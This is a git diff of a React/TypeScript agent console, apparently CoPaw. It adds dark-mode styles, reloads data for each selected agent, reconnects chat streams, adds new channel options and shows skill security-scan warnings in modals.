+ + {selectedSource.status.indexed + ? t("knowledge.indexed") + : t("knowledge.notIndexed")} + +
+
+ + {selectedSourceRemoteLine ? ( +
+
Remote
+
{selectedSourceRemoteLine}
+
+ ) : null} + + {selectedSource.status.remote_last_error ? ( + + {t("knowledge.remoteLastError", { + error: selectedSource.status.remote_last_error, + })} + + ) : null} + + + +
+
{t("knowledge.documentContent")}
+ {sourceContentLoading ? ( +
+ +
+ ) : !sourceContent?.indexed ? ( + + {selectedSource.status.indexed + ? t("knowledge.documentContentEmpty") + : t("knowledge.documentContentNotIndexed")} + + ) : ( +
+ {sourceContent.documents.map((doc, idx) => ( +
+ {sourceContent.documents.length > 1 && ( + + {doc.title || doc.path} + + )} +
+ +
+
+ ))} +
+ )} +
+
+ ) : null} +
+ + + + ); +} + +export default KnowledgePage; \ No newline at end of file diff --git a/console/src/pages/Agent/MCP/index.tsx b/console/src/pages/Agent/MCP/index.tsx index 5d640535b..f1bca6032 100644 --- a/console/src/pages/Agent/MCP/index.tsx +++ b/console/src/pages/Agent/MCP/index.tsx @@ -94,7 +94,7 @@ function MCPPage() { // Format 2: { "key": { "command": "...", ... } } // Format 3: { "key": "...", "name": "...", "command": "...", ... } (direct) - let clientsToCreate: Array<{ key: string; data: any }> = []; + const clientsToCreate: Array<{ key: string; data: any }> = []; if (parsed.mcpServers) { // Format 1: nested mcpServers diff --git a/console/src/pages/Agent/MCP/useMCP.ts b/console/src/pages/Agent/MCP/useMCP.ts index fcba7f367..e8c998ea5 100644 --- a/console/src/pages/Agent/MCP/useMCP.ts +++ b/console/src/pages/Agent/MCP/useMCP.ts @@ -3,9 +3,11 @@ import { message } from "@agentscope-ai/design"; import api from "../../../api"; import type { MCPClientInfo } from "../../../api/types"; import { useTranslation } from "react-i18next"; +import { useAgentStore } from "../../../stores/agentStore"; export function useMCP() { const { t } = useTranslation(); + const { selectedAgent } = useAgentStore(); const [clients, setClients] = useState([]); const [loading, setLoading] = useState(false); @@ -24,7 +26,7 @@ export function useMCP() { useEffect(() => { loadClients(); - }, [loadClients]); + }, [loadClients, selectedAgent]); const createClient = useCallback( async ( diff --git a/console/src/pages/Agent/Skills/index.module.less b/console/src/pages/Agent/Skills/index.module.less index de08a9a9c..3aed9c4a7 100644 --- a/console/src/pages/Agent/Skills/index.module.less +++ b/console/src/pages/Agent/Skills/index.module.less @@ -326,3 +326,95 @@ min-height: 50px; } } + +/* ─── Dark mode ─────────────────────────────────────────────────────────────── */ +:global(.dark-mode) { + .description { + color: rgba(255, 255, 255, 0.35); + } + + .loadingText { + color: rgba(255, 255, 255, 0.35); + } + + /* Import modal hints */ + .importHintTitle { + color: rgba(255, 255, 255, 0.55); + } + + .importHintList { + color: rgba(255, 255, 255, 0.35); + } + + .importUrlInput { + background: #2a2a2a; + border-color: rgba(255, 255, 255, 0.15); + color: rgba(255, 255, 255, 0.85); + + &::placeholder { + color: rgba(255, 255, 255, 0.25); + } + + &:focus { + border-color: #615ced; + } + } + + .importLoadingText { + color: rgba(255, 255, 255, 0.45); + } + + /* Skill card */ + .skillCard { + &.normal { + border-color: rgba(255, 255, 255, 0.08) !important; + box-shadow: 0 4px 12px rgba(0, 0, 0, 0.3) !important; + } + + &.hover { + border-color: #615ced !important; + box-shadow: 0 12px 32px rgba(0, 0, 0, 0.4) !important; + } + } + + .skillTitle { + color: rgba(255, 255, 255, 0.85); + } + + .statusDot.disabled { + background-color: rgba(255, 255, 255, 0.2); + } + + .statusText.disabled { + color: rgba(255, 255, 255, 0.3); + } + + /* Description info block */ + .infoBlock { + color: rgba(255, 255, 255, 0.65); + background-color: rgba(255, 255, 255, 0.05); + border-color: rgba(255, 255, 255, 0.08); + } + + /* Source / Path labels */ + .infoLabel { + color: rgba(255, 255, 255, 0.3); + } + + /* Card footer divider */ + .cardFooter { + border-top-color: rgba(255, 255, 255, 0.08); + } + + /* Toggle label */ + .toggleLabel { + color: rgba(255, 255, 255, 0.45); + } + + /* Markdown viewer */ + .markdownViewer { + border-color: rgba(255, 255, 255, 0.1); + background-color: #1f1f1f; + color: rgba(255, 255, 255, 0.85); + } +} diff --git a/console/src/pages/Agent/Skills/index.tsx b/console/src/pages/Agent/Skills/index.tsx index abd99a9f0..62cf05d36 100644 --- a/console/src/pages/Agent/Skills/index.tsx +++ b/console/src/pages/Agent/Skills/index.tsx @@ -33,6 +33,7 @@ function SkillsPage() { "https://lobehub.com/", "https://market.lobehub.com/", "https://github.com/", + "https://modelscope.cn/skills/", ]; const isSupportedSkillUrl = (url: string) => { @@ -177,6 +178,7 @@ function SkillsPage() {
  • https://lobehub.com/
  • https://market.lobehub.com/
  • https://github.com/
  • +
  • https://modelscope.cn/skills/
  • {t("skills.urlExamples")}

      @@ -188,6 +190,7 @@ function SkillsPage() {
    • https://github.com/anthropics/skills/tree/main/skills/skill-creator
    • +
    • https://modelscope.cn/skills/@anthropics/skill-creator
    diff --git a/console/src/pages/Agent/Skills/useSkills.ts b/console/src/pages/Agent/Skills/useSkills.ts index 28545f236..1f57749ba 100644 --- a/console/src/pages/Agent/Skills/useSkills.ts +++ b/console/src/pages/Agent/Skills/useSkills.ts @@ -1,13 +1,190 @@ -import { useState, useEffect } from "react"; +import { useState, useEffect, useCallback } from "react"; import { message, Modal } from "@agentscope-ai/design"; +import React from "react"; import api from "../../../api"; import type { SkillSpec } from "../../../api/types"; +import type { SecurityScanErrorResponse } from "../../../api/modules/security"; +import { useTranslation } from "react-i18next"; +import { useAgentStore } from "../../../stores/agentStore"; + +function tryParseScanError(error: unknown): SecurityScanErrorResponse | null { + if (!(error instanceof Error)) return null; + const msg = error.message || ""; + const jsonStart = msg.indexOf("{"); + if (jsonStart === -1) return null; + try { + const parsed = JSON.parse(msg.substring(jsonStart)); + if (parsed?.type === "security_scan_failed") { + return parsed as SecurityScanErrorResponse; + } + } catch { + // not JSON + } + return null; +} export function useSkills() { + const { t } = useTranslation(); + const { selectedAgent } = useAgentStore(); const [skills, setSkills] = useState([]); const [loading, setLoading] = useState(false); const [importing, setImporting] = useState(false); + const showScanErrorModal = useCallback( + (scanError: SecurityScanErrorResponse) => { + const findings = scanError.findings || []; + Modal.error({ + title: t("security.skillScanner.scanError.title"), + width: 640, + content: React.createElement( + "div", + null, + React.createElement( + "p", + null, + t("security.skillScanner.scanError.description"), + ), + React.createElement( + "div", + { + style: { + maxHeight: 300, + overflow: "auto", + marginTop: 8, + }, + }, + findings.map((f, i) => + React.createElement( + "div", + { + key: i, + style: { + padding: "8px 12px", + marginBottom: 4, + background: "#fafafa", + borderRadius: 6, + border: "1px solid #f0f0f0", + }, + }, + React.createElement( + "strong", + { style: { marginBottom: 4, display: "block" } }, + f.title, + ), + React.createElement( + "div", + { style: { fontSize: 12, color: "#666" } }, + f.file_path + (f.line_number ? `:${f.line_number}` : ""), + ), + f.description && + React.createElement( + "div", + { + style: { + fontSize: 12, + color: "#999", + marginTop: 2, + }, + }, + f.description, + ), + ), + ), + ), + ), + }); + }, + [t], + ); + + const handleError = useCallback( + (error: unknown, defaultMsg: string): boolean => { + const scanError = tryParseScanError(error); + if (scanError) { + showScanErrorModal(scanError); + return true; + } + console.error(defaultMsg, error); + message.error(defaultMsg); + return false; + }, + [showScanErrorModal], + ); + + const checkScanWarnings = useCallback( + async (skillName: string) => { + try { + const [alerts, scannerCfg] = await Promise.all([ + api.getBlockedHistory(), + api.getSkillScanner(), + ]); + if (!alerts.length) return; + if ( + scannerCfg?.whitelist?.some( + (w: { skill_name: string }) => w.skill_name === skillName, + ) + ) + return; + const latestForSkill = alerts + .filter((a) => a.skill_name === skillName && a.action === "warned") + .pop(); + if (!latestForSkill) return; + const findings = latestForSkill.findings || []; + Modal.warning({ + title: t("security.skillScanner.scanError.title"), + width: 640, + content: React.createElement( + "div", + null, + React.createElement( + "p", + null, + t("security.skillScanner.scanError.warnDescription"), + ), + React.createElement( + "div", + { style: { maxHeight: 300, overflow: "auto", marginTop: 8 } }, + findings.map((f, i) => + React.createElement( + "div", + { + key: i, + style: { + padding: "8px 12px", + marginBottom: 4, + background: "#fafafa", + borderRadius: 6, + border: "1px solid #f0f0f0", + }, + }, + React.createElement( + "strong", + { style: { marginBottom: 4, display: "block" } }, + f.title, + ), + React.createElement( + "div", + { style: { fontSize: 12, color: "#666" } }, + f.file_path + (f.line_number ? `:${f.line_number}` : ""), + ), + f.description && + React.createElement( + "div", + { style: { fontSize: 12, color: "#999", marginTop: 2 } }, + f.description, + ), + ), + ), + ), + ), + }); + } catch { + // non-critical + } + }, + [t], + ); + const fetchSkills = async () => { setLoading(true); try { @@ -37,17 +214,17 @@ export function useSkills() { return () => { mounted = false; }; - }, []); + }, [selectedAgent]); const createSkill = async (name: string, content: string) => { try { await api.createSkill(name, content); message.success("Created successfully"); await fetchSkills(); + await checkScanWarnings(name); return true; } catch (error) { - console.error("Failed to save skill", error); - message.error("Failed to save"); + handleError(error, "Failed to save"); return false; } }; @@ -71,13 +248,13 @@ export function useSkills() { if (result?.installed) { message.success(`Imported skill: ${result.name}`); await fetchSkills(); + if (result.name) await checkScanWarnings(result.name); return true; } message.error("Import failed"); return false; } catch (error) { - console.error("Failed to import skill from hub", error); - message.error("Import failed"); + handleError(error, "Import failed"); return false; } finally { setImporting(false); @@ -102,11 +279,11 @@ export function useSkills() { ), ); message.success("Enabled successfully"); + await checkScanWarnings(skill.name); } return true; } catch (error) { - console.error("Failed to toggle skill", error); - message.error("Operation failed"); + handleError(error, "Operation failed"); return false; } }; diff --git a/console/src/pages/Agent/Tools/useTools.ts b/console/src/pages/Agent/Tools/useTools.ts index 4fce6c20b..0938e6deb 100644 --- a/console/src/pages/Agent/Tools/useTools.ts +++ b/console/src/pages/Agent/Tools/useTools.ts @@ -3,9 +3,11 @@ import { message } from "@agentscope-ai/design"; import api from "../../../api"; import type { ToolInfo } from "../../../api/modules/tools"; import { useTranslation } from "react-i18next"; +import { useAgentStore } from "../../../stores/agentStore"; export function useTools() { const { t } = useTranslation(); + const { selectedAgent } = useAgentStore(); const [tools, setTools] = useState([]); const [loading, setLoading] = useState(false); const [batchLoading, setBatchLoading] = useState(false); @@ -25,21 +27,37 @@ export function useTools() { useEffect(() => { loadTools(); - }, [loadTools]); + }, [loadTools, selectedAgent]); const toggleEnabled = useCallback( async (tool: ToolInfo) => { + // Optimistic update + setTools((prev) => + prev.map((t) => + t.name === tool.name ? { ...t, enabled: !t.enabled } : t, + ), + ); + try { - await api.toggleTool(tool.name); + const result = await api.toggleTool(tool.name); message.success( tool.enabled ? t("tools.disableSuccess") : t("tools.enableSuccess"), ); - await loadTools(); - } catch { + // Update with server response (no full reload) + setTools((prev) => + prev.map((t) => (t.name === result.name ? result : t)), + ); + } catch (error) { + // Revert optimistic update on error + setTools((prev) => + prev.map((t) => + t.name === tool.name ? { ...t, enabled: tool.enabled } : t, + ), + ); message.error(t("tools.toggleError")); } }, - [t, loadTools], + [t], ); const enableAll = useCallback(async () => { @@ -49,13 +67,26 @@ export function useTools() { return; } + // Optimistic update + setTools((prev) => prev.map((t) => ({ ...t, enabled: true }))); + setBatchLoading(true); try { - await Promise.all(disabledTools.map((tool) => api.toggleTool(tool.name))); + const results = await Promise.all( + disabledTools.map((tool) => api.toggleTool(tool.name)), + ); message.success(t("tools.enableAllSuccess")); - await loadTools(); - } catch { + // Update with server responses + setTools((prev) => + prev.map((t) => { + const result = results.find((r) => r.name === t.name); + return result || t; + }), + ); + } catch (error) { message.error(t("tools.toggleError")); + // Reload on error to sync with server + await loadTools(); } finally { setBatchLoading(false); } @@ -68,13 +99,26 @@ export function useTools() { return; } + // Optimistic update + setTools((prev) => prev.map((t) => ({ ...t, enabled: false }))); + setBatchLoading(true); try { - await Promise.all(enabledTools.map((tool) => api.toggleTool(tool.name))); + const results = await Promise.all( + enabledTools.map((tool) => api.toggleTool(tool.name)), + ); message.success(t("tools.disableAllSuccess")); - await loadTools(); - } catch { + // Update with server responses + setTools((prev) => + prev.map((t) => { + const result = results.find((r) => r.name === t.name); + return result || t; + }), + ); + } catch (error) { message.error(t("tools.toggleError")); + // Reload on error to sync with server + await loadTools(); } finally { setBatchLoading(false); } diff --git a/console/src/pages/Agent/Workspace/components/useAgentsData.ts b/console/src/pages/Agent/Workspace/components/useAgentsData.ts index f6965f273..4fd75af95 100644 --- a/console/src/pages/Agent/Workspace/components/useAgentsData.ts +++ b/console/src/pages/Agent/Workspace/components/useAgentsData.ts @@ -4,9 +4,12 @@ import { useTranslation } from "react-i18next"; import api from "../../../../api"; import type { MarkdownFile, DailyMemoryFile } from "../../../../api/types"; import { workspaceApi } from "../../../../api/modules/workspace"; +import { agentsApi } from "../../../../api/modules/agents"; +import { useAgentStore } from "../../../../stores/agentStore"; export const useAgentsData = () => { const { t } = useTranslation(); + const { selectedAgent } = useAgentStore(); const [files, setFiles] = useState([]); const [selectedFile, setSelectedFile] = useState(null); const [dailyMemories, setDailyMemories] = useState([]); @@ -19,12 +22,51 @@ export const useAgentsData = () => { useEffect(() => { const initializeData = async () => { + // Remember currently selected file name + const previouslySelectedFilename = selectedFile?.filename; + + // Clear content first + setFileContent(""); + setOriginalContent(""); + setExpandedMemory(false); + const enabled = await fetchEnabledFiles(); - await fetchFiles(enabled); + const fileList = await agentsApi.listAgentFiles(selectedAgent); + const sortedFiles = sortFilesByEnabled( + fileList as unknown as MarkdownFile[], + enabled, + ); + setFiles(sortedFiles); + + // Set workspace path + if (fileList.length > 0) { + const path = fileList[0].path; + const workspace = path.substring( + 0, + path.lastIndexOf("/") || path.lastIndexOf("\\"), + ); + setWorkspacePath(workspace); + } + + // Try to re-select the same file in new workspace + if (previouslySelectedFilename) { + const sameFile = sortedFiles.find( + (f) => f.filename === previouslySelectedFilename, + ); + if (sameFile) { + // Auto-load the same file from new workspace + await handleFileClick(sameFile); + } else { + // File doesn't exist in new workspace, clear selection + setSelectedFile(null); + } + } else { + setSelectedFile(null); + } }; initializeData(); // eslint-disable-next-line react-hooks/exhaustive-deps - }, []); + }, [selectedAgent]); // Re-sort when enabledFiles changes (for toggle/reorder operations) useEffect(() => { @@ -82,9 +124,10 @@ export const useAgentsData = () => { const enabled = Array.isArray(latestEnabledFiles) ? latestEnabledFiles : await fetchEnabledFiles(); - const fileList = await api.listFiles(); + // Use agent-specific API + const fileList = await agentsApi.listAgentFiles(selectedAgent); const sortedFiles = sortFilesByEnabled( - fileList as MarkdownFile[], + fileList as unknown as MarkdownFile[], enabled, ); setFiles(sortedFiles); @@ -126,7 +169,8 @@ export const useAgentsData = () => { setSelectedFile(file); setLoading(true); try { - const data = await api.loadFile(file.filename); + // Use agent-specific API + const data = await agentsApi.readAgentFile(selectedAgent, file.filename); setFileContent(data.content); setOriginalContent(data.content); } catch (error) { diff --git a/console/src/pages/Agent/Workspace/index.module.less b/console/src/pages/Agent/Workspace/index.module.less index e6ecac52d..631e13d8d 100644 --- a/console/src/pages/Agent/Workspace/index.module.less +++ b/console/src/pages/Agent/Workspace/index.module.less @@ -404,3 +404,131 @@ text-align: right; flex-shrink: 0; } + +/* ─── Dark mode ─────────────────────────────────────────────────────────────── */ +:global(.dark-mode) { + .description { + color: rgba(255, 255, 255, 0.35); + } + + .workspacePath { + color: rgba(255, 255, 255, 0.3); + } + + .infoText { + color: rgba(255, 255, 255, 0.3); + } + + .divider { + background-color: rgba(255, 255, 255, 0.08); + } + + /* File list items */ + .fileItem { + background-color: #2a2a2a; + border-color: rgba(255, 255, 255, 0.1); + + &:hover:not(.selected) { + border-color: rgba(255, 255, 255, 0.2); + background-color: #333; + } + + &.selected { + border-color: #615ced; + background-color: rgba(97, 92, 237, 0.15); + } + } + + .fileItemName { + color: rgba(255, 255, 255, 0.85); + } + + .fileItemMeta { + color: rgba(255, 255, 255, 0.35); + } + + .expandIcon { + color: rgba(255, 255, 255, 0.3); + } + + .dragHandle { + color: rgba(255, 255, 255, 0.2); + + &:hover { + color: #8b87f0; + } + } + + .dragging { + box-shadow: 0 4px 12px rgba(0, 0, 0, 0.4); + border-color: #615ced !important; + background-color: rgba(97, 92, 237, 0.15) !important; + } + + /* Daily memory items */ + .dailyMemoryItem { + background-color: #2a2a2a; + border-color: rgba(255, 255, 255, 0.1); + + &:hover:not(.selected) { + border-color: rgba(255, 255, 255, 0.2); + background-color: #333; + } + + &.selected { + border-color: #615ced; + background-color: rgba(97, 92, 237, 0.15); + } + } + + .dailyMemoryName { + color: rgba(255, 255, 255, 0.85); + } + + .dailyMemoryMeta { + color: rgba(255, 255, 255, 0.35); + } + + /* Editor area */ + .editorHeader { + border-bottom-color: rgba(255, 255, 255, 0.08); + } + + .fileName { + color: rgba(255, 255, 255, 0.85); + } + + .filePath { + color: rgba(255, 255, 255, 0.35); + } + + .markdownViewer { + border-color: rgba(255, 255, 255, 0.1); + color: rgba(255, 255, 255, 0.85); + background: #1f1f1f; + } + + .toggleLabel { + color: rgba(255, 255, 255, 0.45); + } + + .emptyState { + color: rgba(255, 255, 255, 0.3); + } + + .sectionTitle { + color: rgba(255, 255, 255, 0.85); + } + + .attribution { + color: rgba(255, 255, 255, 0.2); + } + + /* Textarea inside editor */ + .textarea, + .editorContent textarea { + background: #2a2a2a !important; + color: rgba(255, 255, 255, 0.85) !important; + border-color: rgba(255, 255, 255, 0.1) !important; + } +} diff --git a/console/src/pages/Chat/ModelSelector/index.module.less b/console/src/pages/Chat/ModelSelector/index.module.less index e720bbfa3..302b6f0e6 100644 --- a/console/src/pages/Chat/ModelSelector/index.module.less +++ b/console/src/pages/Chat/ModelSelector/index.module.less @@ -174,3 +174,71 @@ padding: 14px 16px; text-align: center; } + +/* ─── Dark mode overrides ─────────────────────────────────────────────────── */ +:global(.dark-mode) { + .trigger { + color: rgba(255, 255, 255, 0.85); + + &:hover, + &.triggerActive { + color: #8b87f0; + box-shadow: 0 2px 8px rgba(97, 92, 237, 0.2); + } + } + + .triggerArrow { + color: rgba(255, 255, 255, 0.3); + + &.triggerArrowOpen { + color: #8b87f0; + } + } + + .panel { + background: #1f1f1f; + border-color: rgba(255, 255, 255, 0.08); + box-shadow: 0 8px 24px rgba(0, 0, 0, 0.4); + } + + .providerItem { + color: rgba(255, 255, 255, 0.85); + + &:hover { + background: rgba(97, 92, 237, 0.15); + color: #8b87f0; + } + } + + .providerArrow { + color: rgba(255, 255, 255, 0.2); + } + + .submenu { + background: #1f1f1f; + border-color: rgba(255, 255, 255, 0.08); + box-shadow: 0 8px 24px rgba(0, 0, 0, 0.4); + } + + .modelItem { + color: rgba(255, 255, 255, 0.85); + + &:hover { + background: rgba(97, 92, 237, 0.15); + color: #8b87f0; + } + + &.modelItemActive { + background: rgba(97, 92, 237, 0.18); + color: #8b87f0; + } + } + + .checkIcon { + color: #8b87f0; + } + + .emptyTip { + color: rgba(255, 255, 255, 0.25); + } +} diff --git a/console/src/pages/Chat/index.tsx b/console/src/pages/Chat/index.tsx index b40674c0e..b0d274fa7 100644 --- a/console/src/pages/Chat/index.tsx +++ b/console/src/pages/Chat/index.tsx @@ -1,6 +1,7 @@ import { AgentScopeRuntimeWebUI, IAgentScopeRuntimeWebUIOptions, + IAgentScopeRuntimeWebUIRef, } from "@agentscope-ai/chat"; import { useCallback, useEffect, useMemo, useRef, useState } from "react"; import { Button, Modal, Result, message } from "antd"; @@ -13,7 +14,12 @@ import defaultConfig, { getDefaultConfig } from "./OptionsPanel/defaultConfig"; import Weather from "./Weather"; import { getApiToken, getApiUrl } from "../../api/config"; import { providerApi } from "../../api/modules/provider"; +import { chatApi } from "../../api/modules/chat"; +import api from "../../api"; import ModelSelector from "./ModelSelector"; +import { useTheme } from "../../contexts/ThemeContext"; +import { useAgentStore } from "../../stores/agentStore"; +import "./index.module.less"; type CopyableContent = { type?: string; @@ -111,11 +117,18 @@ export default function ChatPage() { const { t } = useTranslation(); const navigate = useNavigate(); const location = useLocation(); + const { isDark } = useTheme(); const chatId = useMemo(() => { const match = location.pathname.match(/^\/chat\/(.+)$/); return match?.[1]; }, [location.pathname]); const [showModelPrompt, setShowModelPrompt] = useState(false); + const { selectedAgent } = useAgentStore(); + const [refreshKey, setRefreshKey] = useState(0); + const [chatStatus, setChatStatus] = useState<"idle" | "running">("idle"); + const [, setReconnectStreaming] = useState(false); + const reconnectTriggeredForRef = useRef(null); + const prevChatIdRef = useRef(undefined); const isComposingRef = useRef(false); const isChatActiveRef = useRef(false); @@ -125,9 +138,15 @@ export default function ChatPage() { const lastSessionIdRef = useRef(null); const chatIdRef = useRef(chatId); const navigateRef = useRef(navigate); + const chatRef = useRef(null); chatIdRef.current = chatId; navigateRef.current = navigate; + useEffect(() => { + sessionApi.setChatRef(chatRef); + return () => sessionApi.setChatRef(null); + }, []); + useEffect(() => { const handleCompositionStart = () => { if (!isChatActiveRef.current) return; @@ -195,6 +214,48 @@ export default function ChatPage() { }; }, []); + // Fetch chat status when viewing a chat (for running indicator and reconnect) + useEffect(() => { + if (!chatId || chatId === "undefined" || chatId === "null") { + setChatStatus("idle"); + return; + } + const realId = sessionApi.getRealIdForSession(chatId) ?? chatId; + api.getChat(realId).then( + (res) => setChatStatus((res.status as "idle" | "running") ?? "idle"), + () => setChatStatus("idle"), + ); + }, [chatId]); + + // Trigger reconnect when session status becomes "running" so the library + // consumes the SSE stream. Done here (not in sessionApi.getSession) so we + // run after React has updated and the chat input ref is ready, avoiding + // a fixed timeout and race conditions. + useEffect(() => { + if (prevChatIdRef.current !== chatId) { + prevChatIdRef.current = chatId; + reconnectTriggeredForRef.current = null; + } + if (!chatId || chatStatus !== "running") return; + if (reconnectTriggeredForRef.current === chatId) return; + reconnectTriggeredForRef.current = chatId; + sessionApi.triggerReconnectSubmit(); + }, [chatId, chatStatus]); + + // Refresh chat when selectedAgent changes + const prevSelectedAgentRef = useRef(selectedAgent); + useEffect(() => { + // Only refresh if selectedAgent actually changed (not initial mount) + if ( + prevSelectedAgentRef.current !== selectedAgent && + prevSelectedAgentRef.current !== undefined + ) { + // Force re-render by updating refresh key + setRefreshKey((prev) => prev + 1); + } + prevSelectedAgentRef.current = selectedAgent; + }, [selectedAgent]); + const getSessionListWrapped = useCallback(async () => { const sessions = await sessionApi.getSessionList(); const currentChatId = chatIdRef.current; @@ -265,10 +326,76 @@ export default function ChatPage() { const customFetch = useCallback( async (data: { - input: any[]; + input?: any[]; biz_params?: any; signal?: AbortSignal; + reconnect?: boolean; + session_id?: string; + user_id?: string; + channel?: string; }): Promise => { + const headers: Record = { + "Content-Type": "application/json", + }; + const token = getApiToken(); + if (token) headers.Authorization = `Bearer ${token}`; + try { + const agentStorage = localStorage.getItem("copaw-agent-storage"); + if (agentStorage) { + const parsed = JSON.parse(agentStorage); + const selectedAgent = parsed?.state?.selectedAgent; + if (selectedAgent) { + headers["X-Agent-Id"] = selectedAgent; + } + } + } catch (error) { + console.warn("Failed to get selected agent from storage:", error); + } + + const shouldReconnect = + data.reconnect || data.biz_params?.reconnect === true; + const reconnectSessionId = + data.session_id ?? window.currentSessionId ?? ""; + if (shouldReconnect && reconnectSessionId) { + const res = await fetch(getApiUrl("/console/chat"), { + method: "POST", + headers, + body: JSON.stringify({ + reconnect: true, + session_id: reconnectSessionId, + user_id: data.user_id ?? window.currentUserId ?? "default", + channel: data.channel ?? window.currentChannel ?? "console", + }), + }); + if (!res.ok || !res.body) return res; + const onStreamEnd = () => { + setChatStatus("idle"); + setReconnectStreaming(false); + }; + const stream = res.body; + const transformed = new ReadableStream({ + start(controller) { + const reader = stream.getReader(); + function pump() { + reader.read().then(({ done, value }) => { + if (done) { + controller.close(); + onStreamEnd(); + return; + } + controller.enqueue(value); + return pump(); + }); + } + pump(); + }, + }); + return new Response(transformed, { + headers: res.headers, + status: res.status, + }); + } + try { const activeModels = await providerApi.getActiveModels(); if ( @@ -283,32 +410,27 @@ export default function ChatPage() { return buildModelError(); } - const { input, biz_params } = data; + const { input = [], biz_params } = data; const session = input[input.length - 1]?.session || {}; + const sessionId = window.currentSessionId || session?.session_id || ""; const requestBody = { input: input.slice(-1), - session_id: window.currentSessionId || session?.session_id || "", + session_id: sessionId, user_id: window.currentUserId || session?.user_id || "default", channel: window.currentChannel || session?.channel || "console", stream: true, ...biz_params, }; - const headers: Record = { - "Content-Type": "application/json", - }; - const token = getApiToken(); - if (token) headers.Authorization = `Bearer ${token}`; - - return fetch(defaultConfig?.api?.baseURL || getApiUrl("/agent/process"), { + return fetch(getApiUrl("/console/chat"), { method: "POST", headers, body: JSON.stringify(requestBody), signal: data.signal, }); }, - [], + [setChatStatus, setReconnectStreaming], ); const options = useMemo(() => { @@ -323,8 +445,18 @@ export default function ChatPage() { ...i18nConfig, theme: { ...defaultConfig.theme, + darkMode: isDark, + leftHeader: { + ...defaultConfig.theme.leftHeader, + }, rightHeader: , }, + welcome: { + ...i18nConfig.welcome, + avatar: isDark + ? `${import.meta.env.BASE_URL}copaw-dark.png` + : `${import.meta.env.BASE_URL}copaw-symbol.svg`, + }, sender: { ...(i18nConfig as any)?.sender, beforeSubmit: handleBeforeSubmit, @@ -334,7 +466,17 @@ export default function ChatPage() { ...defaultConfig.api, fetch: customFetch, cancel(data: { session_id: string }) { - console.log(data); + const chatIdForStop = data?.session_id + ? sessionApi.getRealIdForSession(data.session_id) ?? data.session_id + : ""; + if (chatIdForStop) { + chatApi.stopConsoleChat(chatIdForStop).then( + () => setChatStatus("idle"), + (err) => { + console.error("stopConsoleChat failed:", err); + }, + ); + } }, }, actions: { @@ -356,11 +498,24 @@ export default function ChatPage() { "weather search mock": Weather, }, } as unknown as IAgentScopeRuntimeWebUIOptions; - }, [wrappedSessionApi, customFetch, copyResponse, t]); + }, [wrappedSessionApi, customFetch, copyResponse, t, isDark]); return ( -
    - +
    +
    + +
    ; /** Real backend UUID, used when id is overridden with a local timestamp. */ realId?: string; + /** Conversation status: idle or running (for reconnect). */ + status?: "idle" | "running"; } // --------------------------------------------------------------------------- @@ -190,6 +195,7 @@ const chatSpecToSession = (chat: ChatSpec): ExtendedSession => channel: chat.channel, messages: [], meta: chat.meta || {}, + status: chat.status ?? "idle", }) as ExtendedSession; /** Returns true when id is a pure numeric local timestamp (not a backend UUID). */ @@ -257,6 +263,35 @@ class SessionApi implements IAgentScopeRuntimeWebUISessionAPI { */ onSessionRemoved: ((removedId: string) => void) | null = null; + /** + * Ref to the chat component so we can trigger submit with reconnect flag + * (library will call customFetch with biz_params.reconnect and consume the SSE stream). + */ + private chatRef: RefObject | null = null; + + setChatRef(ref: RefObject | null): void { + this.chatRef = ref; + } + + /** + * Programmatically trigger the library's submit with biz_params.reconnect so + * customFetch does POST /console/chat with reconnect:true and the library + * consumes the SSE stream (replay + live tail). + */ + triggerReconnectSubmit(): void { + const ref = this.chatRef?.current; + if (!ref?.input?.submit) { + console.warn("triggerReconnectSubmit: chatRef not available"); + return; + } + ref.input.submit({ + query: "", + biz_params: { + reconnect: true, + } as IAgentScopeRuntimeWebUIInputData["biz_params"], + }); + } + private createEmptySession(sessionId: string): ExtendedSession { window.currentSessionId = sessionId; window.currentUserId = DEFAULT_USER_ID; @@ -342,7 +377,11 @@ class SessionApi implements IAgentScopeRuntimeWebUISessionAPI { this.sessionRequests.set(sessionId, requestPromise); try { - return await requestPromise; + const result = await requestPromise; + // Reconnect for running sessions is triggered by ChatPage when session + // status becomes "running" (useEffect on chatStatus), avoiding a fixed + // timeout and race conditions with the chat input ref. + return result; } finally { this.sessionRequests.delete(sessionId); } @@ -369,6 +408,7 @@ class SessionApi implements IAgentScopeRuntimeWebUISessionAPI { messages: convertMessages(chatHistory.messages || []), meta: fromList.meta || {}, realId: fromList.realId, + status: chatHistory.status ?? "idle", }; this.updateWindowVariables(session); return session; @@ -404,6 +444,7 @@ class SessionApi implements IAgentScopeRuntimeWebUISessionAPI { messages: convertMessages(chatHistory.messages || []), meta: refreshed.meta || {}, realId: refreshed.realId, + status: chatHistory.status ?? "idle", }; this.updateWindowVariables(session); return session; @@ -434,6 +475,7 @@ class SessionApi implements IAgentScopeRuntimeWebUISessionAPI { channel: fromList?.channel || DEFAULT_CHANNEL, messages: convertMessages(chatHistory.messages || []), meta: fromList?.meta || {}, + status: chatHistory.status ?? "idle", }; this.updateWindowVariables(session); diff --git a/console/src/pages/Control/Channels/components/ChannelDrawer.tsx b/console/src/pages/Control/Channels/components/ChannelDrawer.tsx index 193ea0666..dab930490 100644 --- a/console/src/pages/Control/Channels/components/ChannelDrawer.tsx +++ b/console/src/pages/Control/Channels/components/ChannelDrawer.tsx @@ -19,8 +19,10 @@ const CHANNELS_WITH_ACCESS_CONTROL: ChannelKey[] = [ "dingtalk", "discord", "feishu", + "wecom", "mattermost", "matrix", + "xiaoyi", ]; interface ChannelDrawerProps { @@ -35,20 +37,41 @@ interface ChannelDrawerProps { onSubmit: (values: Record) => void; } -// Doc URLs per channel (anchors on https://copaw.agentscope.io/docs/channels) -const CHANNEL_DOC_URLS: Partial> = { +// Doc EN URLs per channel (anchors on https://copaw.agentscope.io/docs/channels) +const CHANNEL_DOC_EN_URLS: Partial> = { dingtalk: - "https://copaw.agentscope.io/docs/channels/#%E9%92%89%E9%92%89%E6%8E%A8%E8%8D%90", - feishu: "https://copaw.agentscope.io/docs/channels/#%E9%A3%9E%E4%B9%A6", + "https://copaw.agentscope.io/docs/channels/?lang=en#DingTalk-recommended", + feishu: "https://copaw.agentscope.io/docs/channels/?lang=en#Feishu-Lark", imessage: - "https://copaw.agentscope.io/docs/channels/#iMessage%E4%BB%85-macOS", - discord: "https://copaw.agentscope.io/docs/channels/#Discord", - qq: "https://copaw.agentscope.io/docs/channels/#QQ", - telegram: "https://copaw.agentscope.io/docs/channels/#Telegram", - mqtt: "https://copaw.agentscope.io/docs/channels/#MQTT", - mattermost: 